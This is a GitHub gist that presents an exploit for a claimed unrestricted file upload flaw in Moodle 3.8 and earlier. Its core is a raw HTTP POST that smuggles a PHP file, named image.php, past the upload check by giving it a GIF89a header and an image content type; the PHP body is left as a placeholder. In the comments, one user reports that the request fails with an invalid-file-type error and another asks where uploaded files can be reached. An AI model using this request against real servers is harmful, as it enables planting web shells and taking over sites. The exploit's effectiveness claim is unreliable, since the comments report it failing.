Skip to content

Instantly share code, notes, and snippets.

@sirwanveisi
Created January 7, 2021 13:29
Show Gist options
  • Save sirwanveisi/8672f333bcc9946b19160ec51e325c2f to your computer and use it in GitHub Desktop.
Save sirwanveisi/8672f333bcc9946b19160ec51e325c2f to your computer and use it in GitHub Desktop.
# Exploit Title: Moodle 3.8 - Unrestricted File Upload
# Date: 2019-09-08
# Exploit Author: Sirwan Veisi
# Vendor Homepage: https://moodle.org/
# Software Link: https://github.com/moodle/moodle
# Version: Moodle Versions 3.8, 3.7, 3.6, 3.5, 3.4...
# Tested on: Moodle Version 3.8
# CWE : CWE-434
I found an Unrestricted Upload vulnerability for Moodle version 3.8 , that
allows the attacker to upload or transfer files of dangerous types.
Example exploitation request:
POST /repository/repository_ajax.php?action=upload HTTP/1.1
Host: VulnerableHost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
Gecko/20100101 Firefox/80.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------38898830537874132223151601680
Content-Length: 2763
Origin: https://VulnerableHost
Connection: close
Referer: https://VulnerableHost/user/files.php
Cookie: MoodleSession=bpn90khjdh7mq4phs8i9r0caai
Upgrade-Insecure-Requests: 1
-----------------------------38898830537874132223151601680
Content-Disposition: form-data; name="repo_upload_file";
filename="image.php"
Content-Type: image/jpeg
GIF89a;
<?php
[code here]
?>
-----------------------------
@maxway2021
Copy link

it's not working
{"error":"\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432 \u0442\u0438\u043f\u0430 \u00ab\u0422\u0435\u043a\u0441\u0442\u043e\u0432\u044b\u0439 \u0444\u0430\u0439\u043b\u00bb \u043d\u0435 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u043e.","errorcode":"invalidfiletype","stacktrace":"* line 185 of /repository/upload/lib.php: moodle_exception thrown\n* line 63 of /repository/upload/lib.php: call to repository_upload->process_upload()\n* line 324 of /repository/repository_ajax.php: call to repository_upload->upload()\n","debuginfo":"\nError code: invalidfiletype","reproductionlink":"http://localhost/"}

@frdhn25
Copy link

frdhn25 commented Jan 1, 2023

Where can i access the uploaded files ?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment